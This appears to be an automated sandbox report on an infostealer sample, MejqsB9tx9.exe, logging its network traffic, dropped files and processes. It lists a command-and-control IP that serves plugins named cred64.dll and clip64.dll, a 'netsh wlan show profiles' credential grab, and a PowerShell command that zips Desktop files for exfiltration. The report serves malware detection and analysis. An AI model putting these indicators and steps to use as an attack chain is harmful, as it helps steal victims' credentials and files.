Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGNfnzbEGIjD1WaW_kQpX5UuTH3k6sLaT2sgha20jAZtNUmX4owd2e1RNY717lgQsRK3T9_HrP4AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-11; NID=513=LYB4zX77Umf0x70_y3tYFtvhwQbj41cOVElm5Iubfl7p3fE9ES0ERyH33N4TkggQO9PNBXaRvYbKU6XqCZWU84GYIbHVzK1CiKkEMjlx_WxVlBBQqrc3wE1VExFKW4RELUZ2TvrtW0SM2m_3hWHqHg1ofWv4YOuin7bYRMiSNgs
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGNjnzbEGIjCy5MxkR43JXxLUWmJrXennO5Nx-D2Gy-xkAQ-34AfzKqBYUVHfWo10HJp47EMi6woyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-11; NID=513=LYB4zX77Umf0x70_y3tYFtvhwQbj41cOVElm5Iubfl7p3fE9ES0ERyH33N4TkggQO9PNBXaRvYbKU6XqCZWU84GYIbHVzK1CiKkEMjlx_WxVlBBQqrc3wE1VExFKW4RELUZ2TvrtW0SM2m_3hWHqHg1ofWv4YOuin7bYRMiSNgs
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Y++Ooa55zBOoU&MD=z2olwUp3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Y++Ooa55zBOoU&MD=z2olwUp3 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
Source: rundll32.exe, 00000009.00000002.2352764094.0000028A6F4C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/3
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D62B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D64E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.2352764094.0000028A6F4C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D64E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=17
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D64E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1E
Source: rundll32.exe, 00000009.00000002.2352764094.0000028A6F4C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1k
Source: rundll32.exe, 00000009.00000002.2352764094.0000028A6F4C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D5C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ws
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D64E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/neh2sXQk0/index.php?wal=1a
Source: powershell.exe, 0000000E.00000002.2340687371.000001E1F2F7F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2339399994.000001E1F2CCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000E.00000002.2302236578.000001E1818DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2334011449.000001E190079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302236578.000001E181887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302236578.000001E181887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2339702128.000001E1F2DD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302236578.000001E18162E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302236578.000001E1815D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2302236578.000001E18162E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000E.00000002.2334011449.000001E190079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2334011449.000001E190079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2334011449.000001E190079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2302236578.000001E180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302236578.000001E181887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2302236578.000001E1818DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2334011449.000001E190079000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.2:443 -> 192.168.2.6:50230 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: MejqsB9tx9.exe Static PE information: section name:
Source: MejqsB9tx9.exe Static PE information: section name: .idata
Source: MejqsB9tx9.exe Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll 12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
Uses 32bit PE files
Source: MejqsB9tx9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MejqsB9tx9.exe Static PE information: Section: ZLIB complexity 0.9981201826407506
Source: MejqsB9tx9.exe Static PE information: Section: mardldcu ZLIB complexity 0.9942997343565525
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981201826407506
Source: explorha.exe.0.dr Static PE information: Section: mardldcu ZLIB complexity 0.9942997343565525
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@39/21@2/6
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000009.00000002.2352445961.0000028A6D5C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64[1].dll.3.dr, cred64.dll.3.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: MejqsB9tx9.exe Virustotal: Detection: 56%
Source: MejqsB9tx9.exe ReversingLabs: Detection: 55%
Source: MejqsB9tx9.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\MejqsB9tx9.exe File read: C:\Users\user\Desktop\MejqsB9tx9.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\MejqsB9tx9.exe "C:\Users\user\Desktop\MejqsB9tx9.exe"
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2000,i,12118425566247776453,12709347483506542613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2000,i,12118425566247776453,12709347483506542613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\MejqsB9tx9.exe Section loaded: uxtheme.dll Jump to behavior
